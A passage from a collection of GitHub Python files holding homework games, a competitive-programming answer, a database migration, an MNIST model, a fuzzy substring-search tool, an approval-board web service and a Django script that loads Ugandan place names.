foundation.print())","repo_name":"boyuantan/kleiner-perkins-2019","sub_path":"solitaire/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":5516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12531891746","text":"import random\n\ndef hw_week7(secret_number):\n y=int(0)\n while True:\n y=y+1\n print('Take a guess.')\n x=int(input())\n if secret_number > x:\n print('Your guess is too low.')\n elif secret_number < x:\n print('Your guess is too high.')\n else:\n print('Good job! You guessed my number in '+ str(y) +' guesses!')\n break\n\nif __name__ == '__main__':\n hw_week7(random.randint(1, 100))","repo_name":"KorenixTechnology/python-lesson-week7-AllenLyu210","sub_path":"hw_week7.py","file_name":"hw_week7.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"5114881260","text":"n = int(input())\nmod = 998244353\n\ndef sum1(f):\n f%=mod\n ans = (1+f)*f/2\n ans %= mod\n return ans\n\ndef digitf(d):\n ans = pow(10,d) - pow(10,d-1)\n return ans\n\ntemp = n\ndigit = 0\nwhile(temp!=0):\n temp//=10\n digit +=1\nans = 0\n\nfor i in range(1, digit):\n f = digitf(i) \n ans += sum1(f)\n ans %= mod\nff = n-pow(10, digit-1)+1 \nans += sum1(ff) \nans %= mod \nprint(int(ans))\n","repo_name":"ayaki-sugawara/atcoder","sub_path":"abc238/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"2292675832","text":"# -*- coding: utf-8 -*-\n\n\"\"\"create y table\n\nRevision ID: 728663ebe30e\nRevises: 4f59069f433e\nCreate Date: 2021-06-07 16:36:54.388978\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = u'728663ebe30e'\ndown_revision = u'4f59069f433e'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table(\n u'example_database_migrations_y',\n sa.Column(u'yid', sa.Integer, primary_key=True)\n )\n\n\ndef downgrade():\n op.drop_table(u'example_database_migrations_y')\n","repo_name":"ckan/ckan","sub_path":"ckanext/example_database_migrations/migration/example_database_migrations/versions/728663ebe30e_create_y_table.py","file_name":"728663ebe30e_create_y_table.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":4093,"dataset":"github-code","pt":"83"} +{"seq_id":"73994649872","text":"import tensorflow as tf\n\n# 定义神经网络的参数\nINPUT_NODE = 784\nOUTPUT_NODE = 10\nLAYER_1_NODE = 500\n\n\ndef get_weights(shape, regularizer):\n weights = tf.get_variable(name='weights', shape=shape,\n initializer=tf.truncated_normal_initializer(stddev=0.1))\n # 将变量的正则化损失加入到损失集合\n if regularizer is not None:\n tf.add_to_collection('loss', regularizer(weights))\n return weights\n\n\ndef inference(input_tensor, regularizer):\n with tf.variable_scope('layer_1'):\n weights = get_weights(shape=[INPUT_NODE, LAYER_1_NODE], regularizer=regularizer)\n biases = tf.get_variable(name='biases', shape=[LAYER_1_NODE],\n initializer=tf.constant_initializer(0.0))\n layer_1 = tf.nn.relu(tf.matmul(input_tensor, weights) + biases)\n\n with tf.variable_scope('layer_2'):\n weights = get_weights(shape=[LAYER_1_NODE, OUTPUT_NODE], regularizer=regularizer)\n biases = tf.get_variable(name='biases', shape=[OUTPUT_NODE],\n initializer=tf.constant_initializer(0.0))\n return tf.matmul(layer_1, weights) + biases\n","repo_name":"gbzhu/tensorFlow_train","sub_path":"MNIST_better_demo/mnist_inference.py","file_name":"mnist_inference.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"43285061194","text":"\"\"\"Основной модуль программы.\n\nИмпорты:\n from typing import ... - для аннотации типов\n from multiprocessing import ... - для мультипроцессинга\n from argparse import ... - для обеспечения CLI\n from colorama import ... - для цветного вывода результата\n from bktree impor ... - для поиска возможных соответствий\n from bohr import ... - для поиска подстрок в строке\n\nФункции:\n fuzzy_search - нечеткий поиск подстрок в строке\n constriction - сузить словарь позиций\n print_colored - вывести цветной результат\n main - точка входа\n\n\"\"\"\nfrom typing import Optional\nfrom multiprocessing import Process, Manager\n\nfrom argparse import ArgumentParser\nfrom colorama import init, Back, Fore, Style\n\nfrom bktree import BKTree, levenshtein_distance\nfrom bohr import Bohr\n\n\ndef fuzzy_search(string: str, substrings: list[str], case_sensitive: bool,\n method: str, count: Optional[int], threshold: int,\n n_process: Optional[int]) -> dict[str, Optional[tuple[int]]]:\n \"\"\"Нечеткий поиск подстрок в строке.\n\n Аргументы:\n string: str - строка, в которой будет производится поиск\n substrings: list[str] - список исходных подстрок для поиска\n case_sensitive: bool - чувствительность к регистру\n method: str - метод поиска подстрок\n (\"first\" - прямой/\"last\" - обратный)\n count: Optional[int] - количество первых вхождений\n threshold: int - порог ошибки\n n_process: Optional[int] - количество процессов\n\n Возвращает словарь с позициями подстрок\n\n \"\"\"\n if count == 0 or n_process == 0:\n return {}\n if not case_sensitive:\n string = string.lower()\n\n scatter = set()\n length = len(string)\n for substring in substrings:\n size = len(substring)\n lower = size - threshold\n upper = size + threshold\n scatter |= set(range(lower if lower > 1 else 1,\n (upper if upper < length else length) + 1))\n\n bktree = BKTree(levenshtein_distance)\n\n for i in range(length):\n dop = scatter.copy()\n for j in scatter:\n if i + j <= length:\n bktree.insert(string[i:i + j])\n else:\n dop.remove(j)\n scatter = dop\n\n fuzzy_substrings = set()\n for substring in substrings:\n fuzzy_substrings |= {substring} \\\n | bktree.search(substring, threshold, n_process)\n\n bohr = Bohr(case_sensitive, method, count)\n\n max_len = 1\n for substring in fuzzy_substrings:\n bohr.add_pattern(substring)\n size = len(substring)\n if size > max_len:\n max_len = size\n\n manager = Manager()\n mdict = manager.dict()\n lock = manager.RLock()\n\n chunk_size = length // (n_process if n_process else 1) + 1\n chunks = [(string[i:i + chunk_size + max_len - 1], i)\n for i in range(0, length, chunk_size)]\n processes = tuple()\n\n search = bohr.search\n for chunk in chunks:\n process = Process(target=search, args=(*chunk, mdict, lock))\n process.start()\n processes += (process,)\n\n for process in processes:\n process.join()\n\n result = constriction(mdict, count, method)\n items = result.items()\n for key, item in items:\n if item:\n result[key] = tuple(sorted(item))\n return result\n\n\ndef constriction(mdict: dict[str, set[int]], count: Optional[int],\n method: str) -> dict[str, Optional[set[int]]]:\n \"\"\"Сузить словарь с позициями подстрок.\n\n Аргументы:\n mdict: dict[str, set[int]] - обрабатываемый словарь\n count: Optional[int] - количество первых вхождений\n method: str - метод поиска подстрок\n (\"first\" - прямой/\"last\" - обратный)\n\n Возвращает обработанный словарь позиций\n\n \"\"\"\n if not count:\n return mdict\n\n indexes = set()\n items = mdict.items()\n for key, index in items:\n if index:\n size = len(key)\n indexes |= set(map(lambda x: x + size, index))\n\n result, result_count = dict.fromkeys(mdict.keys()), 0\n indexes = sorted(indexes, reverse=(False if method == \"first\" else True))\n\n for index in indexes:\n for key, item in items:\n pos = index - len(key)\n if item and pos in item:\n\n if result[key]:\n result[key] |= {pos}\n else:\n result[key] = {pos}\n\n result_count += 1\n if result_count == count:\n return result\n\n return result\n\n\ndef print_colored(string: str, result: dict[str, Optional[tuple[int]]]):\n \"\"\"Вывести цветной результат поиска.\n\n Аргументы:\n string: str - строка, в которой производился поиск\n result: dict[str, Optional[tuple[int]]] - результат поиска\n подстрок в string\n\n Функции:\n colors - создать и вернуть кортеж цветов\n\n \"\"\"\n\n def colors(ansi):\n \"\"\"Создать и вернуть кортеж цветов для ansi.\"\"\"\n return (ansi.BLUE, ansi.CYAN, ansi.GREEN, ansi.MAGENTA, ansi.RED,\n ansi.YELLOW, ansi.LIGHTBLUE_EX, ansi.LIGHTCYAN_EX,\n ansi.LIGHTGREEN_EX, ansi.LIGHTMAGENTA_EX, ansi.LIGHTRED_EX,\n ansi.LIGHTYELLOW_EX)\n\n b_colors = colors(Back)\n f_colors = colors(Fore)\n\n indices = {}\n color = 0\n color_result = result.copy()\n for pattern in result:\n if result[pattern] is not None:\n size = len(pattern)\n for i in result[pattern]:\n indices |= dict.fromkeys(tuple(range(i, i + size)),\n b_colors[color])\n color_result[f_colors[color] + pattern\n + Style.RESET_ALL] = color_result.pop(pattern)\n color = (color + 1) % 12\n else:\n color_result[pattern] = color_result.pop(pattern)\n\n print()\n count = 0\n for i, char in enumerate(string):\n if i in indices:\n print(indices[i] + char, end=\"\")\n else:\n print(char, end=\"\")\n if char == \"\\n\":\n count += 1\n if count == 10:\n break\n\n print_result = \"\\n{\"\n for pattern in color_result:\n print_result += \"'\" + pattern + \"': \" + str(color_result[pattern])\n print_result += \", \"\n print(print_result[:-2] + \"}\")\n\n\ndef main():\n \"\"\"Основная функция программы: точка входа.\n\n Добавляет и парсит аргументы, после чего вызывает\n функцию поиска и выводит результат\n\n \"\"\"\n parser = ArgumentParser()\n parser.add_argument(\"-s\", \"--string\", type=str, nargs=\"+\", required=True)\n parser.add_argument(\"-f\", \"--file\", action=\"store_true\", default=False)\n parser.add_argument(\"-rf\", \"--result-file\", type=str, default=None)\n parser.add_argument(\"-ss\", \"--sub-string\", type=str,\n nargs=\"+\", required=True)\n parser.add_argument(\"-cs\", \"--case-sensitive\",\n action=\"store_true\", default=False)\n parser.add_argument(\"-m\", \"--method\",\n choices=(\"first\", \"last\"), default=\"first\")\n parser.add_argument(\"-c\", \"--count\", type=int, default=None)\n parser.add_argument(\"-t\", \"--threshold\", type=int, default=1)\n parser.add_argument(\"-p\", \"--process\", type=int, default=None)\n\n args = parser.parse_args()\n strings = args.string\n file_flag = args.file\n result_file = args.result_file\n substrings = args.sub_string\n case_sensitive = args.case_sensitive\n method = args.method\n count = args.count\n threshold = args.threshold\n n_process = args.process\n\n error = __file__.rsplit('\\\\', 1)[-1] + \": error: \"\n if len(strings) > 10:\n print(error + \"the number of strings cant be more than 10\")\n return\n if file_flag:\n if len(strings) > 1:\n print(error + \"cant be specified the path to more than one file\")\n return\n try:\n file = open(strings[0], \"r\", encoding=\"utf-8\")\n except FileNotFoundError:\n print(error + \"file not found\")\n return\n else:\n strings = (\"\".join(file.readlines()),)\n finally:\n file.close()\n if count and count < 0:\n print(error + \"count cant be negative\")\n return\n if threshold < 0:\n print(error + \"threshold cant be negative\")\n return\n if n_process and n_process < 0:\n print(error + \"process cant be negative\")\n return\n\n if result_file:\n try:\n rfile = open(result_file, \"w\", encoding=\"utf-8\")\n except PermissionError:\n print(error + \"unable to open result file\")\n return\n\n results = tuple()\n for string in strings:\n results += (fuzzy_search(string, substrings, case_sensitive,\n method, count, threshold, n_process),)\n\n init(autoreset=True)\n for i, result in enumerate(results):\n print_colored(strings[i], result)\n if result_file:\n rfile.write(str(result) + \"\\n\")\n\n if result_file:\n rfile.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DefioOWol/structures","sub_path":"Lab-9/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10025,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"72456962832","text":"from asyncio import constants\nimport os\nimport shutil\nimport sys\nimport copy\nimport json\nimport re\nimport uuid\nimport io\nimport csv\nimport tempfile\nfrom collections import Counter\nfrom datetime import datetime\n\nfrom allscapeAPIMain import db\nfrom allscapeAPIMain import procCode\nfrom allscapeAPIMain import procName\nfrom allscapeAPIMain import spaceHome\nfrom allscapeAPIMain import approvalBoardFile\n\nfrom common import constants\nfrom common.excelService import excelService\nfrom common.logManage import logManage\nfrom projectApprovalBoardManage.sqlProjectApprovalBoardManage import (\n sqlProjectApprovalBoardManage,\n)\nfrom logManage.servLogManage import servLogManage\nfrom projectProcessManage.servProjectProcessManage import servProjectProcessManage\nfrom projectProcessManage.sqlProjectProcessManage import sqlProjectProcessManage\n\nlogs = logManage() # 사용자 관리 API 로그를 남기기 위한 객체 할당\n\n\nclass servProjectApprovalBoardManage:\n \"\"\"승인게시판 관리 Service Class\"\"\"\n\n def post_approval(\n self,\n cons_code,\n co_code,\n writer_id,\n post_type,\n title,\n content,\n approvals,\n files,\n ):\n \"\"\"승인글 작성\"\"\"\n\n #### 승인글 업로드 ####\n dbms = copy.copy(db) # DB 속성이 중복 되지 않도록 객체 복사\n servProjProcMana = servProjectProcessManage()\n\n queryList = list()\n dataList = list()\n post_uuid = str(uuid.uuid4()).replace(\"-\", \"\") # 승인글 uuid 생성\n\n #### 승인글 작성 ####\n query = sqlProjectApprovalBoardManage.insert_approval(\n cons_code,\n post_uuid,\n writer_id,\n post_type,\n # title,\n # json.dumps(content, ensure_ascii=False),\n )\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"insert_approval Query : \" + query,\n )\n queryList.append(query)\n dataList.append([title, json.dumps(content, ensure_ascii=False)])\n #### 작성자 추가 ####\n query = sqlProjectApprovalBoardManage.insert_info(\n cons_code, post_uuid, writer_id, constants.APPRO_TYPE_CD_DRAFTER, 0\n )\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"insert_approval_info Query : \" + query,\n )\n queryList.append(query)\n dataList.append([])\n #### 기타 관련자 추가 ####\n\n if approvals:\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"approvals : \" + str(approvals),\n )\n for _, approval in zip(range(1, len(approvals) + 1), approvals):\n for approver in approval:\n query = sqlProjectApprovalBoardManage.insert_info(\n cons_code,\n post_uuid,\n approver[\"id\"],\n approver[\"apr_type\"],\n approver[\"index\"],\n )\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"insert_info Query : \" + query,\n )\n queryList.append(query)\n dataList.append([])\n\n resCd, msg, _ = dbms.executeIterSpecial(queryList, dataList)\n\n #### 승인글 uuid 정보를 추출하여 디렉토리 생성하기\n if resCd == 0:\n if files:\n file_path = \"\".join(\n [\n spaceHome,\n approvalBoardFile.replace(\"{post_uuid}\", post_uuid),\n ]\n )\n os.makedirs(file_path, exist_ok=True)\n\n #### 파일 정보를 받아 DB 및 디렉토리에 저장하기\n file_dict = {\n \"f\": 0,\n \"q\": 1,\n } # f: 기타, q: 견적\n for key in files.keys():\n if not re.match(\"[f, q]_\\d+\", key):\n continue\n file_type = file_dict[key[0]]\n upload_file = files[key]\n #### 파일 기본정보 생성 및 저장 ####\n orig_name = upload_file.filename\n _, ext = os.path.splitext(orig_name)\n chan_name = str(uuid.uuid4()).replace(\"-\", \"\") + ext\n upload_file.save(file_path + chan_name)\n\n #### 파일 DB에 업로드 ####\n query = sqlProjectApprovalBoardManage.insert_approval_file(\n post_uuid,\n file_path,\n file_type,\n chan_name,\n )\n\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"insert_approval_file Query : \" + query,\n )\n\n resCd, msg, _ = dbms.executeSpecial(query, orig_name)\n\n #### 파일 DB 등록 실패시 파일삭제 ####\n if resCd != 0:\n os.remove(file_path + chan_name)\n\n return resCd, msg, post_uuid\n\n def get_approval_list(\n self,\n id,\n cons_code,\n co_code,\n co_name,\n writer_name,\n post_type,\n title_keyword,\n content_keyword,\n reg_date_start,\n reg_date_end,\n ):\n \"\"\"승인글 리스트 조회\"\"\"\n\n dbms = copy.copy(db) # DB 속성이 중복 되지 않도록 객체 복사\n servProcessMana = servProjectProcessManage()\n\n query = sqlProjectApprovalBoardManage.select_approval_list(\n id,\n cons_code,\n post_type,\n reg_date_start,\n reg_date_end,\n )\n\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"select_approval_list Query : \" + query,\n )\n\n resCd, msg, approvalList = dbms.querySpecial(\n query,\n [\n \"%Y%m%d\",\n \"%Y%m%d\",\n f\"%{co_name}%\",\n f\"%{writer_name}%\",\n f\"%{title_keyword}%\",\n f\"%{content_keyword}%\",\n ],\n )\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"select_approval_list result : \" + str(resCd) + str(msg),\n )\n return resCd, msg, approvalList\n\n def get_approval(self, id, cons_code, co_code, uuid):\n \"\"\"승인글 조회\"\"\"\n\n dbms = copy.copy(db) # DB 속성이 중복 되지 않도록 객체 복사\n servProcessMana = servProjectProcessManage()\n\n #### 읽은 표시하기 ####\n query = sqlProjectApprovalBoardManage.update_readdate(cons_code, uuid, id)\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"update_readdate Query : \" + query,\n )\n resCd, msg, approvalData = dbms.execute(query)\n\n if resCd == 0:\n query = sqlProjectApprovalBoardManage.select_approval(cons_code, uuid)\n\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"select_approval Query : \" + query,\n )\n\n resCd, msg, approvalData = dbms.queryForObject(query)\n try:\n jsonData = json.loads(approvalData[\"content\"])\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"aaaaaaaaaaaaaaaaaaaaaaaa : \" + jsonData,\n )\n approvalData = jsonData\n\n #approvalData['reason'] = jsonData['reason']\n #approvalData['content'] = jsonData['content']\n #approvalData['change_date'] = jsonData['change_date']\n\n\n approvalData.update(jsonData)\n #approvalData['content'] = jsonData\n\n except:\n pass\n\n #### 첨부파일 정보 첨가하기 ####\n if resCd == 0 and approvalData:\n query = sqlProjectApprovalBoardManage.select_approval_file(\n approvalData[\"uuid\"]\n )\n\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"select_approval_file Query : \" + query,\n )\n\n resCd, msg, fileData = dbms.query(query)\n if resCd == 0 and fileData:\n approvalData[\"files\"] = fileData\n\n #### 관련자 정보 첨가하기 ####\n if resCd == 0:\n query = sqlProjectApprovalBoardManage.select_info_list(\n cons_code, approvalData[\"uuid\"]\n )\n\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"select_info_list Query : \" + query,\n )\n\n resCd, msg, infoData = dbms.query(query)\n if resCd == 0 and infoData:\n approvalData[\"info\"] = infoData\n\n return resCd, msg, approvalData\n\n def put_approval(\n self, cons_code, post_uuid, post_type, title, content, approvals, deletes, files\n ):\n \"\"\"승인글 수정\"\"\"\n dbms = copy.copy(db) # DB 속성이 중복 되지 않도록 객체 복사\n\n queryList = list()\n\n #### 승인글 정보 초기화 ####\n query = sqlProjectApprovalBoardManage.update_approval_reset(\n cons_code, post_uuid\n )\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"update_approval_reset Query : \" + query,\n )\n queryList.append(query)\n\n #### 승인 상태 초기화 ####\n query = sqlProjectApprovalBoardManage.update_apr_reset(cons_code, post_uuid)\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"update_apr_reset Query : \" + query,\n )\n queryList.append(query)\n\n resCd, msg, _ = dbms.executeIter(queryList)\n\n #### 승인 초기화가 성공해야 수정작업 가능 ####\n if resCd == 0:\n\n #### 권한 수정 ####\n if approvals:\n query = sqlProjectApprovalBoardManage.delete_info_all(cons_code, post_uuid)\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"delete_info_all Query : \" + query,\n )\n queryList.append(query)\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"approvals : \" + str(approvals),\n )\n for _, approval in zip(range(1, len(approvals) + 1), approvals):\n for approver in approval:\n query = sqlProjectApprovalBoardManage.insert_info(\n cons_code,\n post_uuid,\n approver[\"id\"],\n approver[\"apr_type\"],\n approver[\"index\"],\n )\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"insert_info Query : \" + query,\n )\n queryList.append(query)\n\n resCd, msg, _ = dbms.executeIter(queryList)\n\n #### 승인글 수정 ####\n if post_type or title or content:\n query = sqlProjectApprovalBoardManage.update_approval(\n cons_code,\n post_uuid,\n post_type,\n # title,\n # json.dumps({k: v.replace('\\\"', \"'\") for k, v in content.items()}, ensure_ascii=False),\n )\n\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n f\"update_approval Query : \" + query,\n )\n\n resCd, msg, _ = dbms.executeSpecial(\n query, [title, json.dumps(content, ensure_ascii=False)]\n )\n\n #### 파일 삭제 ####\n if deletes:\n delete_index = f\"{','.join(str(num) for num in deletes)}\"\n query = sqlProjectApprovalBoardManage.delete_approval_file(\n post_uuid, delete_index\n )\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"delete_approval_file Query : \" + query,\n )\n resCd, msg, _ = dbms.execute(query)\n\n #### 파일 추가 ####\n #### 승인글 uuid 정보를 추출하여 디렉토리 생성하기 ####\n if files:\n file_path = \"\".join(\n [\n spaceHome,\n approvalBoardFile.replace(\"{post_uuid}\", post_uuid),\n ]\n )\n os.makedirs(file_path, exist_ok=True)\n\n #### 파일 정보를 받아 DB 및 디렉토리에 저장하기\n file_dict = {\n \"f\": 0,\n \"q\": 1,\n } # f: 기타, q: 견적\n for key in files.keys():\n if not re.match(\"[f, q]_\\d+\", key):\n continue\n file_type = file_dict[key[0]]\n file = files[key]\n\n #### 파일 기본정보 생성 및 저장 ####\n orig_name = file.filename\n _, ext = os.path.splitext(orig_name)\n chan_name = str(uuid.uuid4()).replace(\"-\", \"\") + ext\n file.save(file_path + chan_name)\n\n #### 파일 DB에 업로드 ####\n query = sqlProjectApprovalBoardManage.insert_approval_file(\n post_uuid,\n file_path,\n file_type,\n chan_name,\n )\n\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"insert_approval_file Query : \" + query,\n )\n\n resCd, msg, _ = dbms.executeSpecial(query, orig_name)\n\n #### 파일 DB 등록 실패시 파일삭제 ####\n if resCd != 0:\n os.remove(file_path + chan_name)\n\n return resCd, msg, None\n\n def delete_approval(self, cons_code, uuid):\n \"\"\"승인글 삭제\"\"\"\n dbms = copy.copy(db) # DB 속성이 중복 되지 않도록 객체 복사\n query = sqlProjectApprovalBoardManage.delete_approval(cons_code, uuid)\n\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"delete_approval Query : \" + query,\n )\n\n resCd, msg, _ = dbms.execute(query)\n\n #### 관련 첨부파일 전부 삭제 ####\n \"\"\"\n if resCd == 0:\n file_path = \"\".join(\n [spaceHome, approvalBoardFile.replace(\"{post_uuid}\", uuid)]\n )\n shutil.rmtree(file_path, ignore_errors=True)\n \"\"\"\n return resCd, msg, None\n\n def withdraw(self, cons_code, uuid):\n \"\"\"승인글 철회\"\"\"\n dbms = copy.copy(db) # DB 속성이 중복 되지 않도록 객체 복사\n query = sqlProjectApprovalBoardManage.withdraw(cons_code, uuid)\n\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"withdraw_approval Query : \" + query,\n )\n\n resCd, msg, _ = dbms.execute(query)\n\n #### 관련 첨부파일 전부 삭제 ####\n \"\"\"\n if resCd == 0:\n file_path = \"\".join(\n [spaceHome, approvalBoardFile.replace(\"{post_uuid}\", uuid)]\n )\n shutil.rmtree(file_path, ignore_errors=True)\n \"\"\"\n return resCd, msg, None\n\n def post_reply(self, post_uuid, parent_uuid, writer_id, content):\n \"\"\"댓글 작성\"\"\"\n\n dbms = copy.copy(db) # DB 속성이 중복 되지 않도록 객체 복사\n query = sqlProjectApprovalBoardManage.insert_reply(\n post_uuid, parent_uuid, writer_id, content\n )\n\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"insert_reply Query : \" + query,\n )\n\n return dbms.executeMulti(query)\n\n def get_reply(self, post_uuid, parent_uuid) -> dict:\n \"\"\"댓글 조회\"\"\"\n dbms = copy.copy(db) # DB 속성이 중복 되지 않도록 객체 복사\n query = sqlProjectApprovalBoardManage.select_reply(post_uuid, parent_uuid)\n\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"select_reply Query : \" + query,\n )\n\n return dbms.query(query)\n\n def put_reply(self, post_uuid, uuid, content) -> dict:\n \"\"\"댓글 수정\"\"\"\n dbms = copy.copy(db) # DB 속성이 중복 되지 않도록 객체 복사\n query = sqlProjectApprovalBoardManage.update_reply(post_uuid, uuid, content)\n\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"update_reply Query : \" + query,\n )\n\n return dbms.execute(query)\n\n def del_reply(self, post_uuid, uuid) -> dict:\n \"\"\"댓글 삭제\"\"\"\n dbms = copy.copy(db) # DB 속성이 중복 되지 않도록 객체 복사\n query = sqlProjectApprovalBoardManage.delete_reply(post_uuid, uuid)\n\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"delete_reply Query : \" + query,\n )\n\n return dbms.execute(query)\n\n def draft(self, cons_code, post_uuid, id) -> dict:\n \"\"\"결재 기안\"\"\"\n\n dbms = copy.copy(db) # DB 속성이 중복 되지 않도록 객체 복사\n query = sqlProjectApprovalBoardManage.update_drafted(cons_code, post_uuid, id)\n\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"update_drafted Query : \" + query,\n )\n\n return dbms.execute(query)\n\n def approve(self, cons_code, post_uuid, id, co_code, remarks) -> dict:\n \"\"\"결재 승인\"\"\"\n\n dbms = copy.copy(db) # DB 속성이 중복 되지 않도록 객체 복사\n query = sqlProjectApprovalBoardManage.update_approved(cons_code, post_uuid, id)\n\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"update_approve Query : \" + query,\n )\n\n return dbms.executeSpecial(query, [remarks])\n\n def deny(self, cons_code, post_uuid, id, remarks) -> dict:\n \"\"\"결재 거절\"\"\"\n\n dbms = copy.copy(db) # DB 속성이 중복 되지 않도록 객체 복사\n query = sqlProjectApprovalBoardManage.update_denied(cons_code, post_uuid, id)\n\n logs.debug(\n procName,\n os.path.basename(__file__),\n sys._getframe(0).f_code.co_name,\n \"update_denied Query : \" + query,\n )\n\n return dbms.executeSpecial(query, [remarks])\n","repo_name":"oscar351/ApiManage","sub_path":"projectApprovalBoardManage/servProjectApprovalBoardManage.py","file_name":"servProjectApprovalBoardManage.py","file_ext":"py","file_size_in_byte":20900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74989730510","text":"#! /usr/bin/python3.4\n# -*-coding:utf-8 -*\n\n\"\"\"List of all variables for our Pendu game\"\"\"\n\n# We will pick word from this list\nlistWord = [\n \"kiwix\",\n \"python\",\n \"openclassrooms\",\n \"coursera\",\n \"stallman\",\n \"wikipedia\",\n \"kisangani\",\n \"programme\",\n \"radio\",\n \"telephone\",\n \"cisco\",\n \"paris\"\n ]\n\nuserScore, maxChoice, scoreFile = 0, 8, \"scores\"\n","repo_name":"Bam92/python-4-everybody","sub_path":"guess/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"18792137761","text":"#!/usr/bin/python3\r\n\r\nimport os\r\nimport django\r\nimport sys\r\n\r\n# Add the project root directory to the Python path\r\nproject_root = os.path.abspath(os.path.join(os.path.dirname(__file__), \"../..\"))\r\nsys.path.append(project_root)\r\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"tutorial.settings\")\r\ndjango.setup()\r\n\r\nfrom newborn.models import District, Subcounty, Parish, Village, CountyMunicipality\r\n\r\ndef populate_database():\r\n # Create District - Kiruhura\r\n district, _ = District.objects.get_or_create(name='Kiruhura')\r\n\r\n # Create County/Municipality - Nyabushozi\r\n county_municipality, _ = CountyMunicipality.objects.get_or_create(district=district, name='Nyabushozi')\r\n\r\n # Create Subcounty - Kenshunga\r\n subcounty, _ = Subcounty.objects.get_or_create(county_municipality=county_municipality, name='Kenshunga')\r\n\r\n # Create Parishes and Villages for each parish\r\n\r\n parishes_and_villages = [\r\n ('Rushere town board', ['Hospital zone', 'Central zone', 'Market zone', 'Police zone']),\r\n ('Rushere', ['Akakoma', 'Akatongore', 'Akatongore 1', 'Burimbi', 'Kyabagyenyi i', 'Komugina', 'Ekishunju', 'Nshwere empango']),\r\n ('Rugongi', ['Buharambo', 'Buzooba', 'Kibingo', 'Kayanga', 'Rwomuti i', 'Rwomuti ii', 'Kakira', 'Kyeitagi', 'Mirama', 'Mitooma', 'Mitooma central', 'Magyegye', 'Migamba', 'Muzaire']),\r\n ('Nyakasharara', ['Butembererwa', 'Katete i', 'Katete ii', 'Kanyabihara', 'Mwaka i', 'Rwabigyemano']),\r\n ('Nshwerenkye', ['Kyabagyenyi ii', 'Rwengwe', 'Nyanga', 'Rwakitura', 'Mugore', 'Nshwere ii']),\r\n ]\r\n\r\n for parish_name, village_names in parishes_and_villages:\r\n parish, _ = Parish.objects.get_or_create(subcounty=subcounty, name=parish_name)\r\n for village_name in village_names:\r\n village, _ = Village.objects.get_or_create(parish=parish, name=village_name)\r\n\r\nif __name__ == '__main__':\r\n populate_database()","repo_name":"Mzee1991/NeoCare-App","sub_path":"v2/districts/Kiruhura/Kenshunga.py","file_name":"Kenshunga.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74916161871","text":"input_file = \"./input.txt\"\noutput_file = 